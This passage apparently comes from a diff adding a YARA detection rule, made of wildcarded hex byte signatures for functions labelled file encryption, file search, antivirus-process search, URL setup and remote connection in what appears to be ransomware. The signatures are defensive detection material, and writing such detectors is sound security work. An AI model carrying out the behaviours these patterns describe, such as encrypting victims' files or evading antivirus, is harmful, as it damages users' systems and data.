+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
+            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$crypt_files_v5_0_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
+            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
+            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
+            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
+            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
+            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
+            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
+            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
+            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
+            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
+            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
+            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
+            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
+            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
+            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
+            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
+            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
+            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
+            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
+            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
+            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
+            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
+            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files_v5_0_1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
+            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
+            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
+            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
+            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
+            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes_v5_0_1 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
+            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
+            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
+            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
+            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
+            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
+            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$set_url_parameters_v5_0_2 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
+            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$set_url_parameters_v5_0_3 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$search_antivirus_processes_v5_0_2 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
+            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
+            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
+            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
+            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
+            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
+            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files_v5_0_2 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
+            6A ?? 56 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8D 44 24 ?? 50 56 FF 15 ?? ??
+            ?? ?? 89 44 24 ?? 8B 4C 24 ?? 33 D2 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
+            44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 44
+            24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 8B
+            44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
+            8B E5 5D C3
+        }
+		$crypt_files_v5_0_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
+            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
+            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
+            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
+            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
+            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
+            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
+            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
+            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
+            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
+            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
+            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
+            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
+            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
+            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
+            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
+            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
+            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
+            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
+            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
+            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
+            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
+            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
+            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v5_0_2 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
+            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$crypt_files_v5_0_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 33 DB B9 ?? ?? ?? ?? 89 5D ?? E8
+            ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ??
+            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 53
+            6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 8D 45 ?? 50 68 ?? ?? ?? ??
+            56 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 81 BE ?? ??
